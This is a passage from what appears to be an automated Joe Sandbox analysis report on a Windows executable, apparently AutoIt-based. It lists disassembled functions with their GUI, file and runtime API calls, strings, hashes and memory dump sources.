                                                • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                • GetWindowDC.USER32(?), ref: 0044A0F6
                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                • GetSysColor.USER32(0000000F), ref: 0044A131
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                • GetSysColor.USER32(00000005), ref: 0044A15B
                                                • GetWindowDC.USER32(?), ref: 0044A1BE
                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                • GetSysColor.USER32(00000008), ref: 0044A265
                                                • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                • String ID:
                                                • API String ID: 1744303182-0
                                                • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                • __mtterm.LIBCMT ref: 00417C34
                                                  • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                  • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                  • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                • __init_pointers.LIBCMT ref: 00417CE6
                                                • __calloc_crt.LIBCMT ref: 00417D54
                                                • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                • API String ID: 4163708885-3819984048
                                                • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: >>>AUTOIT SCRIPT<<<$\
                                                • API String ID: 0-1896584978
                                                • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2485277191-404129466
                                                • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                • SetWindowTextW.USER32(?,?), ref: 00454678
                                                • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                • GetWindowRect.USER32(?,?), ref: 004546F5
                                                • SetWindowTextW.USER32(?,?), ref: 00454765
                                                • GetDesktopWindow.USER32 ref: 0045476F
                                                • GetWindowRect.USER32(00000000), ref: 00454776
                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                • GetClientRect.USER32(?,?), ref: 004547D2
                                                • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                • String ID:
                                                • API String ID: 3869813825-0
                                                • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcslen.LIBCMT ref: 00464B28
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                • _wcslen.LIBCMT ref: 00464C28
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                • _wcslen.LIBCMT ref: 00464CBA
                                                • _wcslen.LIBCMT ref: 00464CD0
                                                • _wcslen.LIBCMT ref: 00464CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcslen$Directory$CurrentSystem
                                                • String ID: D
                                                • API String ID: 1914653954-2746444292
                                                • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcsncpy.LIBCMT ref: 0045CE39
                                                • __wsplitpath.LIBCMT ref: 0045CE78
                                                • _wcscat.LIBCMT ref: 0045CE8B
                                                • _wcscat.LIBCMT ref: 0045CE9E
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                • _wcscpy.LIBCMT ref: 0045CF61
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                • String ID: *.*
                                                • API String ID: 1153243558-438819550
                                                • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll
                                                • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                • API String ID: 3832890014-4202584635
                                                • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                • GetFocus.USER32 ref: 0046A0DD
                                                • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessagePost$CtrlFocus
                                                • String ID: 0
                                                • API String ID: 1534620443-4108050209
                                                • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(?), ref: 004558E3
                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$CreateDestroy
                                                • String ID: ,$tooltips_class32
                                                • API String ID: 1109047481-3856767331
                                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                • String ID: 0
                                                • API String ID: 1441871840-4108050209
                                                • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                • __swprintf.LIBCMT ref: 00460915
                                                • __swprintf.LIBCMT ref: 0046092D
                                                • _wprintf.LIBCMT ref: 004609E1
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                • API String ID: 3631882475-2268648507
                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
